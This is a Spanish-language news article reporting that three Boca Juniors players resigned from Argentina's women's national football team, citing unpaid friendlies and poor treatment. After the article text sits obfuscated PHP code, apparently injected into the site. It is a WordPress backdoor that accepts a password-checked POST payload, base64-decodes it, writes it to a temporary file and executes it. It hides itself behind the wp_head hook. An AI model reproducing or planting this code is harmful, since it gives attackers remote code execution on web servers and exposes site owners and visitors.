Tres referentes de la Selección Argentina pegaron el portazo por falta de apoyo

Lorena BenítezJulieta Cruz Laurina Oliveros, jugadoras y referentes de la Selección Argentina de fútbol femenino, anunciaron, mediante comunicados en sus redes sociales, su renuncia al plantel celeste y blanco, a días de disputarse una fecha FIFA.

Con esta decisión, las futbolistas, que juegan en Boca Juniors, no estarán en el amistoso a disputarse ante Costa Rica, este viernes en el estadio Ciudad de Caseros y el lunes próximo en el estadio Ciudad de Vicente López.

La primera en difundir su decisión fue Lorena Benítez, con un comunicado en sus redes: “Fue una decisión personal, por varios motivos tristísimos que vengo viviendo con la Selección”.

Agregó que los amistosos ante Costa Rica “…fueron hechos acá para ‘NO TENER GASTOS’ y que las jugadoras no reciban nada ‘ya que no hay plata’. Pero a nuestras familias sí cobrarles $5.000 el ingreso al estadio. Y así millones de cosas que hemos pasado, siendo BOLUDEADAS una y otra vez”.

El temblor no cesó ahí. Poco después, Julieta Cruz envió su posteó. “Representar a tu país, intentar siempre dejar todo, esforzarte, sacrificarte y dejando mil cosas de lado, llega un punto que cansan las injusticias, que cansa no ser valorada, no ser escuchada y peor aún ser humilladas”, escribió.

La arquera Laurina Oliveros posteó: “Con el corazón partido y mil ilusiones que se esfuman de a poco”.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}